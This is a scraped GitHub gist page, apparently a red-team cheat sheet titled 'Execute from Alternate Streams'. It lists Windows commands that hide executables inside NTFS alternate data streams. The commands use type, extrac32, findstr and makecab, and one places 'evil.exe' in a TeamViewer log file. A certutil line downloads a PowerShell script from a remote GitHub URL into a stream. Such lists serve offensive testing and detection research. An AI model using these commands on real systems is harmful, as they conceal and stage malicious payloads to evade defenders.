Skip to content

Instantly share code, notes, and snippets.

View thebigplate's full-sized avatar
🏠
Working from home

thebigplate

🏠
Working from home
4 followers · 6 following
View GitHub Profile
@api0cradle
api0cradle / Exe_ADS_Methods.md
Last active October 8, 2025 08:06
Execute from Alternate Streams

Add content to ADS

type C:\temp\evil.exe > "C:\Program Files (x86)\TeamViewer\TeamViewer12_Logfile.log:evil.exe"

extrac32 C:\ADS\procexp.cab c:\ADS\file.txt:procexp.exe

findstr /V /L W3AllLov3DonaldTrump c:\ADS\procexp.exe > c:\ADS\file.txt:procexp.exe

certutil.exe -urlcache -split -f https://raw.githubusercontent.com/Moriarty2016/git/master/test.ps1 c:\temp:ttt

makecab c:\ADS\autoruns.exe c:\ADS\cabtest.txt:autoruns.cab